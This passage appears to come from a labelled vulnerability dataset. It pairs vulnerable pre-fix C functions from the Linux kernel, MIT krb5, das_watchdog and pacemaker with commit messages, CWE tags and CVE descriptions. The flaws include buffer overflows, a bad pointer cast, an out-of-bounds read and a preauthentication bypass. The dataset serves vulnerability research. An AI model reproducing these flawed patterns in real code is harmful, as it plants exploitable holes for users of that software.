__func__, skb->dev->name);
goto skip_defrtr;
}
/* Do not accept RA with source-addr found on local machine unless
* accept_ra_from_local is set to true.
*/
if (!in6_dev->cnf.accept_ra_from_local &&
ipv6_chk_addr(dev_net(in6_dev->dev), &ipv6_hdr(skb)->saddr,
NULL, 0)) {
ND_PRINTK(2, info,
"RA from local address detected on dev: %s: default router ignored\n",
skb->dev->name);
goto skip_defrtr;
}
lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
#ifdef CONFIG_IPV6_ROUTER_PREF
pref = ra_msg->icmph.icmp6_router_pref;
/* 10b is handled as if it were 00b (medium) */
if (pref == ICMPV6_ROUTER_PREF_INVALID ||
!in6_dev->cnf.accept_ra_rtr_pref)
pref = ICMPV6_ROUTER_PREF_MEDIUM;
#endif
rt = rt6_get_dflt_router(&ipv6_hdr(skb)->saddr, skb->dev);
if (rt) {
neigh = dst_neigh_lookup(&rt->dst, &ipv6_hdr(skb)->saddr);
if (!neigh) {
ND_PRINTK(0, err,
"RA: %s got default router without neighbour\n",
__func__);
ip6_rt_put(rt);
return;
}
}
if (rt && lifetime == 0) {
ip6_del_rt(rt);
rt = NULL;
}
ND_PRINTK(3, info, "RA: rt: %p lifetime: %d, for dev: %s\n",
rt, lifetime, skb->dev->name);
if (rt == NULL && lifetime) {
ND_PRINTK(3, info, "RA: adding default router\n");
rt = rt6_add_dflt_router(&ipv6_hdr(skb)->saddr, skb->dev, pref);
if (rt == NULL) {
ND_PRINTK(0, err,
"RA: %s failed to add default route\n",
__func__);
return;
}
neigh = dst_neigh_lookup(&rt->dst, &ipv6_hdr(skb)->saddr);
if (neigh == NULL) {
ND_PRINTK(0, err,
"RA: %s got default router without neighbour\n",
__func__);
ip6_rt_put(rt);
return;
}
neigh->flags |= NTF_ROUTER;
} else if (rt) {
rt->rt6i_flags = (rt->rt6i_flags & ~RTF_PREF_MASK) | RTF_PREF(pref);
}
if (rt)
rt6_set_expires(rt, jiffies + (HZ * lifetime));
if (ra_msg->icmph.icmp6_hop_limit) {
in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
if (rt)
dst_metric_set(&rt->dst, RTAX_HOPLIMIT,
ra_msg->icmph.icmp6_hop_limit);
}
skip_defrtr:
/*
* Update Reachable Time and Retrans Timer
*/
if (in6_dev->nd_parms) {
unsigned long rtime = ntohl(ra_msg->retrans_timer);
if (rtime && rtime/1000 < MAX_SCHEDULE_TIMEOUT/HZ) {
rtime = (rtime*HZ)/1000;
if (rtime < HZ/10)
rtime = HZ/10;
NEIGH_VAR_SET(in6_dev->nd_parms, RETRANS_TIME, rtime);
in6_dev->tstamp = jiffies;
inet6_ifinfo_notify(RTM_NEWLINK, in6_dev);
}
rtime = ntohl(ra_msg->reachable_time);
if (rtime && rtime/1000 < MAX_SCHEDULE_TIMEOUT/(3*HZ)) {
rtime = (rtime*HZ)/1000;
if (rtime < HZ/10)
rtime = HZ/10;
if (rtime != NEIGH_VAR(in6_dev->nd_parms, BASE_REACHABLE_TIME)) {
NEIGH_VAR_SET(in6_dev->nd_parms,
BASE_REACHABLE_TIME, rtime);
NEIGH_VAR_SET(in6_dev->nd_parms,
GC_STALETIME, 3 * rtime);
in6_dev->nd_parms->reachable_time = neigh_rand_reach_time(rtime);
in6_dev->tstamp = jiffies;
inet6_ifinfo_notify(RTM_NEWLINK, in6_dev);
}
}
}
skip_linkparms:
/*
* Process options.
*/
if (!neigh)
neigh = __neigh_lookup(&nd_tbl, &ipv6_hdr(skb)->saddr,
skb->dev, 1);
if (neigh) {
u8 *lladdr = NULL;
if (ndopts.nd_opts_src_lladdr) {
lladdr = ndisc_opt_addr_data(ndopts.nd_opts_src_lladdr,
skb->dev);
if (!lladdr) {
ND_PRINTK(2, warn,
"RA: invalid link-layer address length\n");
goto out;
}
}
neigh_update(neigh, lladdr, NUD_STALE,
NEIGH_UPDATE_F_WEAK_OVERRIDE|
NEIGH_UPDATE_F_OVERRIDE|
NEIGH_UPDATE_F_OVERRIDE_ISROUTER|
NEIGH_UPDATE_F_ISROUTER);
}
if (!ipv6_accept_ra(in6_dev)) {
ND_PRINTK(2, info,
"RA: %s, accept_ra is false for dev: %s\n",
__func__, skb->dev->name);
goto out;
}
#ifdef CONFIG_IPV6_ROUTE_INFO
if (!in6_dev->cnf.accept_ra_from_local &&
ipv6_chk_addr(dev_net(in6_dev->dev), &ipv6_hdr(skb)->saddr,
NULL, 0)) {
ND_PRINTK(2, info,
"RA from local address detected on dev: %s: router info ignored.\n",
skb->dev->name);
goto skip_routeinfo;
}
if (in6_dev->cnf.accept_ra_rtr_pref && ndopts.nd_opts_ri) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_opts_ri;
p;
p = ndisc_next_option(p, ndopts.nd_opts_ri_end)) {
struct route_info *ri = (struct route_info *)p;
#ifdef CONFIG_IPV6_NDISC_NODETYPE
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT &&
ri->prefix_len == 0)
continue;
#endif
if (ri->prefix_len == 0 &&
!in6_dev->cnf.accept_ra_defrtr)
continue;
if (ri->prefix_len > in6_dev->cnf.accept_ra_rt_info_max_plen)
continue;
rt6_route_rcv(skb->dev, (u8 *)p, (p->nd_opt_len) << 3,
&ipv6_hdr(skb)->saddr);
}
}
skip_routeinfo:
#endif
#ifdef CONFIG_IPV6_NDISC_NODETYPE
/* skip link-specific ndopts from interior routers */
if (skb->ndisc_nodetype == NDISC_NODETYPE_NODEFAULT) {
ND_PRINTK(2, info,
"RA: %s, nodetype is NODEFAULT (interior routes), dev: %s\n",
__func__, skb->dev->name);
goto out;
}
#endif
if (in6_dev->cnf.accept_ra_pinfo && ndopts.nd_opts_pi) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_opts_pi;
p;
p = ndisc_next_option(p, ndopts.nd_opts_pi_end)) {
addrconf_prefix_rcv(skb->dev, (u8 *)p,
(p->nd_opt_len) << 3,
ndopts.nd_opts_src_lladdr != NULL);
}
}
if (ndopts.nd_opts_mtu && in6_dev->cnf.accept_ra_mtu) {
__be32 n;
u32 mtu;
memcpy(&n, ((u8 *)(ndopts.nd_opts_mtu+1))+2, sizeof(mtu));
mtu = ntohl(n);
if (mtu < IPV6_MIN_MTU || mtu > skb->dev->mtu) {
ND_PRINTK(2, warn, "RA: invalid mtu: %d\n", mtu);
} else if (in6_dev->cnf.mtu6 != mtu) {
in6_dev->cnf.mtu6 = mtu;
if (rt)
dst_metric_set(&rt->dst, RTAX_MTU, mtu);
rt6_mtu_change(skb->dev, mtu);
}
}
if (ndopts.nd_useropts) {
struct nd_opt_hdr *p;
for (p = ndopts.nd_useropts;
p;
p = ndisc_next_useropt(p, ndopts.nd_useropts_end)) {
ndisc_ra_useropt(skb, p);
}
}
if (ndopts.nd_opts_tgt_lladdr || ndopts.nd_opts_rh) {
ND_PRINTK(2, warn, "RA: invalid RA options\n");
}
out:
ip6_rt_put(rt);
if (neigh)
neigh_release(neigh);
}
| 143,930,665,896,709,250,000,000,000,000,000,000,000 | ndisc.c | 115,440,394,696,074,500,000,000,000,000,000,000,000 | [
"CWE-17"
] | CVE-2015-2922 | The ndisc_router_discovery function in net/ipv6/ndisc.c in the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in the Linux kernel before 3.19.6 allows remote attackers to reconfigure a hop-limit setting via a small hop_limit value in a Router Advertisement (RA) message. | https://nvd.nist.gov/vuln/detail/CVE-2015-2922 |
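The mitigation quoted from RFC 3756 in the commit message, ignore attempts to set a very small hop limit, translates to accepting the advertised value only when it raises the interface's current setting. A hedged sketch of the hop-limit block; upstream may log or propagate the metric slightly differently:

	if (ra_msg->icmph.icmp6_hop_limit) {
		/* Only ever raise the hop limit; a spoofed RA advertising a
		 * tiny value must not make legitimate packets expire early. */
		if (in6_dev->cnf.hop_limit < ra_msg->icmph.icmp6_hop_limit) {
			in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
			if (rt)
				dst_metric_set(&rt->dst, RTAX_HOPLIMIT,
					       ra_msg->icmph.icmp6_hop_limit);
		} else {
			ND_PRINTK(2, warn,
				  "RA: ignoring attempt to lower hop_limit\n");
		}
	}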
1,489 | das_watchdog | bd20bb02e75e2c0483832b52f2577253febfb690 | https://github.com/kmatheussen/das_watchdog | https://github.com/kmatheussen/das_watchdog/commit/bd20bb02e75e2c0483832b52f2577253febfb690 | Fix memory overflow if the name of an environment is larger than 500 characters. Bug found by Adam Sampson. | 1 | static char *get_pid_environ_val(pid_t pid,char *val){
char temp[500];
int i=0;
int foundit=0;
FILE *fp;
sprintf(temp,"/proc/%d/environ",pid);
fp=fopen(temp,"r");
if(fp==NULL)
return NULL;
for(;;){
temp[i]=fgetc(fp);
if(foundit==1 && (temp[i]==0 || temp[i]=='\0' || temp[i]==EOF)){
char *ret;
temp[i]=0;
ret=malloc(strlen(temp)+10);
sprintf(ret,"%s",temp);
fclose(fp);
return ret;
}
switch(temp[i]){
case EOF:
fclose(fp);
return NULL;
case '=':
temp[i]=0;
if(!strcmp(temp,val)){
foundit=1;
}
i=0;
break;
case '\0':
i=0;
break;
default:
i++;
}
}
}
| 127,977,327,279,497,000,000,000,000,000,000,000,000 | das_watchdog.c | 25,596,189,492,826,565,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2831 | Buffer overflow in das_watchdog 0.9.0 allows local users to execute arbitrary code with root privileges via a large string in the XAUTHORITY environment variable. | https://nvd.nist.gov/vuln/detail/CVE-2015-2831 |
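The overflow is unbounded growth of i: every byte read lands in temp[i] with no check against the 500-byte buffer, so an environment entry longer than that (such as a huge XAUTHORITY) smashes the stack. One simple guard is to bound the index, as sketched below; the actual das_watchdog patch may instead grow the buffer dynamically:

    default:
      /* Never index past the fixed buffer; oversized names or values
         are truncated and will simply fail to match. */
      if (i < (int)sizeof(temp) - 1)
        i++;
      break;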
1,490 | krb5 | 3db8dfec1ef50ddd78d6ba9503185995876a39fd | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/3db8dfec1ef50ddd78d6ba9503185995876a39fd | Fix IAKERB context export/import [CVE-2015-2698]
The patches for CVE-2015-2696 contained a regression in the newly
added IAKERB iakerb_gss_export_sec_context() function, which could
cause it to corrupt memory. Fix the regression by properly
dereferencing the context_handle pointer before casting it.
Also, the patches did not implement an IAKERB gss_import_sec_context()
function, under the erroneous belief that an exported IAKERB context
would be tagged as a krb5 context. Implement it now to allow IAKERB
contexts to be successfully exported and imported after establishment.
CVE-2015-2698:
In any MIT krb5 release with the patches for CVE-2015-2696 applied, an
application which calls gss_export_sec_context() may experience memory
corruption if the context was established using the IAKERB mechanism.
Historically, some vulnerabilities of this nature can be translated
into remote code execution, though the necessary exploits must be
tailored to the individual application and are usually quite
complicated.
CVSSv2 Vector: AV:N/AC:H/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C
ticket: 8273 (new)
target_version: 1.14
tags: pullup | 1 | iakerb_gss_export_sec_context(OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
gss_buffer_t interprocess_token)
{
OM_uint32 maj;
iakerb_ctx_id_t ctx = (iakerb_ctx_id_t)context_handle;
/* We don't currently support exporting partially established contexts. */
if (!ctx->established)
return GSS_S_UNAVAILABLE;
maj = krb5_gss_export_sec_context(minor_status, &ctx->gssc,
interprocess_token);
if (ctx->gssc == GSS_C_NO_CONTEXT) {
iakerb_release_context(ctx);
*context_handle = GSS_C_NO_CONTEXT;
}
return maj;
}
| 327,336,867,353,175,950,000,000,000,000,000,000,000 | iakerb.c | 282,483,658,881,223,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2698 | The iakerb_gss_export_sec_context function in lib/gssapi/krb5/iakerb.c in MIT Kerberos 5 (aka krb5) 1.14 pre-release 2015-09-14 improperly accesses a certain pointer, which allows remote authenticated users to cause a denial of service (memory corruption) or possibly have unspecified other impact by interacting with an application that calls the gss_export_sec_context function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2015-2696. | https://nvd.nist.gov/vuln/detail/CVE-2015-2698 |
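The memory corruption is in the second declaration of the function above: context_handle is a gss_ctx_id_t *, yet it is cast directly to iakerb_ctx_id_t instead of being dereferenced first, so all later field accesses land on the wrong object. The one-line correction described in the commit message:

    iakerb_ctx_id_t ctx = (iakerb_ctx_id_t)*context_handle;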
1,491 | krb5 | f0c094a1b745d91ef2f9a4eae2149aac026a5789 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/f0c094a1b745d91ef2f9a4eae2149aac026a5789 | Fix build_principal memory bug [CVE-2015-2697]
In build_principal_va(), use k5memdup0() instead of strdup() to make a
copy of the realm, to ensure that we allocate the correct number of
bytes and do not read past the end of the input string. This bug
affects krb5_build_principal(), krb5_build_principal_va(), and
krb5_build_principal_alloc_va(). krb5_build_principal_ext() is not
affected.
CVE-2015-2697:
In MIT krb5 1.7 and later, an authenticated attacker may be able to
cause a KDC to crash using a TGS request with a large realm field
beginning with a null byte. If the KDC attempts to find a referral to
answer the request, it constructs a principal name for lookup using
krb5_build_principal() with the requested realm. Due to a bug in this
function, the null byte causes only one byte to be allocated for the
realm field of the constructed principal, far less than its length.
Subsequent operations on the lookup principal may cause a read beyond
the end of the mapped memory region, causing the KDC process to crash.
CVSSv2: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C
ticket: 8252 (new)
target_version: 1.14
tags: pullup | 1 | build_principal_va(krb5_context context, krb5_principal princ,
unsigned int rlen, const char *realm, va_list ap)
{
krb5_error_code retval = 0;
char *r = NULL;
krb5_data *data = NULL;
krb5_int32 count = 0;
krb5_int32 size = 2; /* initial guess at needed space */
char *component = NULL;
data = malloc(size * sizeof(krb5_data));
if (!data) { retval = ENOMEM; }
if (!retval) {
r = strdup(realm);
if (!r) { retval = ENOMEM; }
}
while (!retval && (component = va_arg(ap, char *))) {
if (count == size) {
krb5_data *new_data = NULL;
size *= 2;
new_data = realloc(data, size * sizeof(krb5_data));
if (new_data) {
data = new_data;
} else {
retval = ENOMEM;
}
}
if (!retval) {
data[count].length = strlen(component);
data[count].data = strdup(component);
if (!data[count].data) { retval = ENOMEM; }
count++;
}
}
if (!retval) {
princ->type = KRB5_NT_UNKNOWN;
princ->magic = KV5M_PRINCIPAL;
princ->realm = make_data(r, rlen);
princ->data = data;
princ->length = count;
r = NULL; /* take ownership */
data = NULL; /* take ownership */
}
if (data) {
while (--count >= 0) {
free(data[count].data);
}
free(data);
}
free(r);
return retval;
}
| 284,043,475,302,472,930,000,000,000,000,000,000,000 | bld_princ.c | 27,830,430,857,955,170,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2697 | The build_principal_va function in lib/krb5/krb/bld_princ.c in MIT Kerberos 5 (aka krb5) before 1.14 allows remote authenticated users to cause a denial of service (out-of-bounds read and KDC crash) via an initial '\0' character in a long realm field within a TGS request. | https://nvd.nist.gov/vuln/detail/CVE-2015-2697 |
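The flaw is the strdup(realm) call: the principal's realm is later treated as an rlen-byte field, but strdup stops at the first NUL, so a realm beginning with '\0' gets a one-byte allocation that subsequent operations read far beyond. The commit message names the replacement, k5memdup0(), which copies exactly rlen bytes plus a terminator:

    if (!retval) {
        /* Allocate rlen bytes plus a trailing NUL, independent of any
         * embedded '\0' in the caller-supplied realm. */
        r = k5memdup0(realm, rlen, &retval);
    }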
1,523 | krb5 | e3b5a5e5267818c97750b266df50b6a3d4649604 | https://github.com/krb5/krb5 | https://github.com/krb5/krb5/commit/e3b5a5e5267818c97750b266df50b6a3d4649604 | Prevent requires_preauth bypass [CVE-2015-2694]
In the OTP kdcpreauth module, don't set the TKT_FLG_PRE_AUTH bit until
the request is successfully verified. In the PKINIT kdcpreauth
module, don't respond with code 0 on empty input or an unconfigured
realm. Together these bugs could cause the KDC preauth framework to
erroneously treat a request as pre-authenticated.
CVE-2015-2694:
In MIT krb5 1.12 and later, when the KDC is configured with PKINIT
support, an unauthenticated remote attacker can bypass the
requires_preauth flag on a client principal and obtain a ciphertext
encrypted in the principal's long-term key. This ciphertext could be
used to conduct an off-line dictionary attack against the user's
password.
CVSSv2 Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N/E:POC/RL:OF/RC:C
ticket: 8160 (new)
target_version: 1.13.2
tags: pullup
subject: requires_preauth bypass in PKINIT-enabled KDC [CVE-2015-2694] | 1 | pkinit_server_verify_padata(krb5_context context,
krb5_data *req_pkt,
krb5_kdc_req * request,
krb5_enc_tkt_part * enc_tkt_reply,
krb5_pa_data * data,
krb5_kdcpreauth_callbacks cb,
krb5_kdcpreauth_rock rock,
krb5_kdcpreauth_moddata moddata,
krb5_kdcpreauth_verify_respond_fn respond,
void *arg)
{
krb5_error_code retval = 0;
krb5_data authp_data = {0, 0, NULL}, krb5_authz = {0, 0, NULL};
krb5_pa_pk_as_req *reqp = NULL;
krb5_pa_pk_as_req_draft9 *reqp9 = NULL;
krb5_auth_pack *auth_pack = NULL;
krb5_auth_pack_draft9 *auth_pack9 = NULL;
pkinit_kdc_context plgctx = NULL;
pkinit_kdc_req_context reqctx = NULL;
krb5_checksum cksum = {0, 0, 0, NULL};
krb5_data *der_req = NULL;
int valid_eku = 0, valid_san = 0;
krb5_data k5data;
int is_signed = 1;
krb5_pa_data **e_data = NULL;
krb5_kdcpreauth_modreq modreq = NULL;
pkiDebug("pkinit_verify_padata: entered!\n");
if (data == NULL || data->length <= 0 || data->contents == NULL) {
(*respond)(arg, 0, NULL, NULL, NULL);
return;
}
if (moddata == NULL) {
(*respond)(arg, EINVAL, NULL, NULL, NULL);
return;
}
plgctx = pkinit_find_realm_context(context, moddata, request->server);
if (plgctx == NULL) {
(*respond)(arg, 0, NULL, NULL, NULL);
return;
}
#ifdef DEBUG_ASN1
print_buffer_bin(data->contents, data->length, "/tmp/kdc_as_req");
#endif
/* create a per-request context */
retval = pkinit_init_kdc_req_context(context, &reqctx);
if (retval)
goto cleanup;
reqctx->pa_type = data->pa_type;
PADATA_TO_KRB5DATA(data, &k5data);
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
pkiDebug("processing KRB5_PADATA_PK_AS_REQ\n");
retval = k5int_decode_krb5_pa_pk_as_req(&k5data, &reqp);
if (retval) {
pkiDebug("decode_krb5_pa_pk_as_req failed\n");
goto cleanup;
}
#ifdef DEBUG_ASN1
print_buffer_bin(reqp->signedAuthPack.data,
reqp->signedAuthPack.length,
"/tmp/kdc_signed_data");
#endif
retval = cms_signeddata_verify(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx, CMS_SIGN_CLIENT,
plgctx->opts->require_crl_checking,
(unsigned char *)
reqp->signedAuthPack.data, reqp->signedAuthPack.length,
(unsigned char **)&authp_data.data,
&authp_data.length,
(unsigned char **)&krb5_authz.data,
&krb5_authz.length, &is_signed);
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
pkiDebug("processing KRB5_PADATA_PK_AS_REQ_OLD\n");
retval = k5int_decode_krb5_pa_pk_as_req_draft9(&k5data, &reqp9);
if (retval) {
pkiDebug("decode_krb5_pa_pk_as_req_draft9 failed\n");
goto cleanup;
}
#ifdef DEBUG_ASN1
print_buffer_bin(reqp9->signedAuthPack.data,
reqp9->signedAuthPack.length,
"/tmp/kdc_signed_data_draft9");
#endif
retval = cms_signeddata_verify(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx, CMS_SIGN_DRAFT9,
plgctx->opts->require_crl_checking,
(unsigned char *)
reqp9->signedAuthPack.data, reqp9->signedAuthPack.length,
(unsigned char **)&authp_data.data,
&authp_data.length,
(unsigned char **)&krb5_authz.data,
&krb5_authz.length, NULL);
break;
default:
pkiDebug("unrecognized pa_type = %d\n", data->pa_type);
retval = EINVAL;
goto cleanup;
}
if (retval) {
pkiDebug("pkcs7_signeddata_verify failed\n");
goto cleanup;
}
if (is_signed) {
retval = verify_client_san(context, plgctx, reqctx, request->client,
&valid_san);
if (retval)
goto cleanup;
if (!valid_san) {
pkiDebug("%s: did not find an acceptable SAN in user "
"certificate\n", __FUNCTION__);
retval = KRB5KDC_ERR_CLIENT_NAME_MISMATCH;
goto cleanup;
}
retval = verify_client_eku(context, plgctx, reqctx, &valid_eku);
if (retval)
goto cleanup;
if (!valid_eku) {
pkiDebug("%s: did not find an acceptable EKU in user "
"certificate\n", __FUNCTION__);
retval = KRB5KDC_ERR_INCONSISTENT_KEY_PURPOSE;
goto cleanup;
}
} else { /* !is_signed */
if (!krb5_principal_compare(context, request->client,
krb5_anonymous_principal())) {
retval = KRB5KDC_ERR_PREAUTH_FAILED;
krb5_set_error_message(context, retval,
_("Pkinit request not signed, but client "
"not anonymous."));
goto cleanup;
}
}
#ifdef DEBUG_ASN1
print_buffer_bin(authp_data.data, authp_data.length, "/tmp/kdc_auth_pack");
#endif
OCTETDATA_TO_KRB5DATA(&authp_data, &k5data);
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
retval = k5int_decode_krb5_auth_pack(&k5data, &auth_pack);
if (retval) {
pkiDebug("failed to decode krb5_auth_pack\n");
goto cleanup;
}
retval = krb5_check_clockskew(context,
auth_pack->pkAuthenticator.ctime);
if (retval)
goto cleanup;
/* check dh parameters */
if (auth_pack->clientPublicValue != NULL) {
retval = server_check_dh(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
&auth_pack->clientPublicValue->algorithm.parameters,
plgctx->opts->dh_min_bits);
if (retval) {
pkiDebug("bad dh parameters\n");
goto cleanup;
}
} else if (!is_signed) {
/*Anonymous pkinit requires DH*/
retval = KRB5KDC_ERR_PREAUTH_FAILED;
krb5_set_error_message(context, retval,
_("Anonymous pkinit without DH public "
"value not supported."));
goto cleanup;
}
der_req = cb->request_body(context, rock);
retval = krb5_c_make_checksum(context, CKSUMTYPE_NIST_SHA, NULL,
0, der_req, &cksum);
if (retval) {
pkiDebug("unable to calculate AS REQ checksum\n");
goto cleanup;
}
if (cksum.length != auth_pack->pkAuthenticator.paChecksum.length ||
k5_bcmp(cksum.contents,
auth_pack->pkAuthenticator.paChecksum.contents,
cksum.length) != 0) {
pkiDebug("failed to match the checksum\n");
#ifdef DEBUG_CKSUM
pkiDebug("calculating checksum on buf size (%d)\n",
req_pkt->length);
print_buffer(req_pkt->data, req_pkt->length);
pkiDebug("received checksum type=%d size=%d ",
auth_pack->pkAuthenticator.paChecksum.checksum_type,
auth_pack->pkAuthenticator.paChecksum.length);
print_buffer(auth_pack->pkAuthenticator.paChecksum.contents,
auth_pack->pkAuthenticator.paChecksum.length);
pkiDebug("expected checksum type=%d size=%d ",
cksum.checksum_type, cksum.length);
print_buffer(cksum.contents, cksum.length);
#endif
retval = KRB5KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED;
goto cleanup;
}
/* check if kdcPkId present and match KDC's subjectIdentifier */
if (reqp->kdcPkId.data != NULL) {
int valid_kdcPkId = 0;
retval = pkinit_check_kdc_pkid(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
(unsigned char *)reqp->kdcPkId.data,
reqp->kdcPkId.length, &valid_kdcPkId);
if (retval)
goto cleanup;
if (!valid_kdcPkId)
pkiDebug("kdcPkId in AS_REQ does not match KDC's cert"
"RFC says to ignore and proceed\n");
}
/* remember the decoded auth_pack for verify_padata routine */
reqctx->rcv_auth_pack = auth_pack;
auth_pack = NULL;
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
retval = k5int_decode_krb5_auth_pack_draft9(&k5data, &auth_pack9);
if (retval) {
pkiDebug("failed to decode krb5_auth_pack_draft9\n");
goto cleanup;
}
if (auth_pack9->clientPublicValue != NULL) {
retval = server_check_dh(context, plgctx->cryptoctx,
reqctx->cryptoctx, plgctx->idctx,
&auth_pack9->clientPublicValue->algorithm.parameters,
plgctx->opts->dh_min_bits);
if (retval) {
pkiDebug("bad dh parameters\n");
goto cleanup;
}
}
/* remember the decoded auth_pack for verify_padata routine */
reqctx->rcv_auth_pack9 = auth_pack9;
auth_pack9 = NULL;
break;
}
/* remember to set the PREAUTH flag in the reply */
enc_tkt_reply->flags |= TKT_FLG_PRE_AUTH;
modreq = (krb5_kdcpreauth_modreq)reqctx;
reqctx = NULL;
cleanup:
if (retval && data->pa_type == KRB5_PADATA_PK_AS_REQ) {
pkiDebug("pkinit_verify_padata failed: creating e-data\n");
if (pkinit_create_edata(context, plgctx->cryptoctx, reqctx->cryptoctx,
plgctx->idctx, plgctx->opts, retval, &e_data))
pkiDebug("pkinit_create_edata failed\n");
}
switch ((int)data->pa_type) {
case KRB5_PADATA_PK_AS_REQ:
free_krb5_pa_pk_as_req(&reqp);
free(cksum.contents);
break;
case KRB5_PADATA_PK_AS_REP_OLD:
case KRB5_PADATA_PK_AS_REQ_OLD:
free_krb5_pa_pk_as_req_draft9(&reqp9);
}
free(authp_data.data);
free(krb5_authz.data);
if (reqctx != NULL)
pkinit_fini_kdc_req_context(context, reqctx);
free_krb5_auth_pack(&auth_pack);
free_krb5_auth_pack_draft9(context, &auth_pack9);
(*respond)(arg, retval, modreq, e_data, NULL);
}
| 7,409,460,042,177,961,000,000,000,000,000,000,000 | pkinit_srv.c | 27,162,181,412,772,705,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-2694 | The kdcpreauth modules in MIT Kerberos 5 (aka krb5) 1.12.x and 1.13.x before 1.13.2 do not properly track whether a client's request has been validated, which allows remote attackers to bypass an intended preauthentication requirement by providing (1) zero bytes of data or (2) an arbitrary realm name, related to plugins/preauth/otp/main.c and plugins/preauth/pkinit/pkinit_srv.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-2694 |
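The bypass paths are the two early returns above that call (*respond)(arg, 0, ...): a zero code tells the kdcpreauth framework the padata verified, both for empty input and for a realm with no pkinit configuration. Per the commit message the fix is to report an error instead; the specific errno chosen here is illustrative:

    if (data == NULL || data->length <= 0 || data->contents == NULL) {
        /* Responding with 0 here let the framework mark the request
         * as pre-authenticated without any verification. */
        (*respond)(arg, EINVAL, NULL, NULL, NULL);
        return;
    }
    /* ... moddata check unchanged ... */
    plgctx = pkinit_find_realm_context(context, moddata, request->server);
    if (plgctx == NULL) {
        (*respond)(arg, EINVAL, NULL, NULL, NULL);
        return;
    }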
1,524 | linux | f84598bd7c851f8b0bf8cd0d7c3be0d73c432ff4 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f84598bd7c851f8b0bf8cd0d7c3be0d73c432ff4 | x86/microcode/intel: Guard against stack overflow in the loader
mc_saved_tmp is a fixed-size array allocated on the stack, so we need to make
sure mc_saved_count stays within its bounds, otherwise we're overflowing
the stack in _save_mc(). A specially crafted microcode header could lead
to a kernel crash or potentially kernel execution.
Signed-off-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Fenghua Yu <fenghua.yu@intel.com>
Link: http://lkml.kernel.org/r/1422964824-22056-1-git-send-email-quentin.casasnovas@oracle.com
Signed-off-by: Borislav Petkov <bp@suse.de> | 1 | get_matching_model_microcode(int cpu, unsigned long start,
void *data, size_t size,
struct mc_saved_data *mc_saved_data,
unsigned long *mc_saved_in_initrd,
struct ucode_cpu_info *uci)
{
u8 *ucode_ptr = data;
unsigned int leftover = size;
enum ucode_state state = UCODE_OK;
unsigned int mc_size;
struct microcode_header_intel *mc_header;
struct microcode_intel *mc_saved_tmp[MAX_UCODE_COUNT];
unsigned int mc_saved_count = mc_saved_data->mc_saved_count;
int i;
while (leftover) {
mc_header = (struct microcode_header_intel *)ucode_ptr;
mc_size = get_totalsize(mc_header);
if (!mc_size || mc_size > leftover ||
microcode_sanity_check(ucode_ptr, 0) < 0)
break;
leftover -= mc_size;
/*
* Since APs with same family and model as the BSP may boot in
* the platform, we need to find and save microcode patches
* with the same family and model as the BSP.
*/
if (matching_model_microcode(mc_header, uci->cpu_sig.sig) !=
UCODE_OK) {
ucode_ptr += mc_size;
continue;
}
_save_mc(mc_saved_tmp, ucode_ptr, &mc_saved_count);
ucode_ptr += mc_size;
}
if (leftover) {
state = UCODE_ERROR;
goto out;
}
if (mc_saved_count == 0) {
state = UCODE_NFOUND;
goto out;
}
for (i = 0; i < mc_saved_count; i++)
mc_saved_in_initrd[i] = (unsigned long)mc_saved_tmp[i] - start;
mc_saved_data->mc_saved_count = mc_saved_count;
out:
return state;
}
| 43,839,155,311,078,540,000,000,000,000,000,000,000 | intel_early.c | 194,639,615,795,702,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-2666 | Stack-based buffer overflow in the get_matching_model_microcode function in arch/x86/kernel/cpu/microcode/intel_early.c in the Linux kernel before 4.0 allows context-dependent attackers to gain privileges by constructing a crafted microcode header and leveraging root privileges for write access to the initrd. | https://nvd.nist.gov/vuln/detail/CVE-2015-2666 |
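mc_saved_tmp holds at most MAX_UCODE_COUNT entries, yet the scan loop calls _save_mc() without ever comparing mc_saved_count against that bound, so a crafted initrd can walk past the end of the stack array. The guard the commit message asks for, sketched on the loop condition; upstream may also clamp inside _save_mc():

	/* Stop scanning once the on-stack array is full: _save_mc() must
	 * never be handed an index at or beyond MAX_UCODE_COUNT. */
	while (leftover && mc_saved_count < ARRAY_SIZE(mc_saved_tmp)) {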
1,529 | pacemaker | 84ac07c | https://github.com/ClusterLabs/pacemaker | https://github.com/ClusterLabs/pacemaker/commit/84ac07c | Fix: acl: Do not delay evaluation of added nodes in some situations
It is not appropriate when the node has no children, as it is not a
placeholder. | 1 | __xml_acl_post_process(xmlNode * xml)
{
xmlNode *cIter = __xml_first_child(xml);
xml_private_t *p = xml->_private;
if(is_set(p->flags, xpf_created)) {
xmlAttr *xIter = NULL;
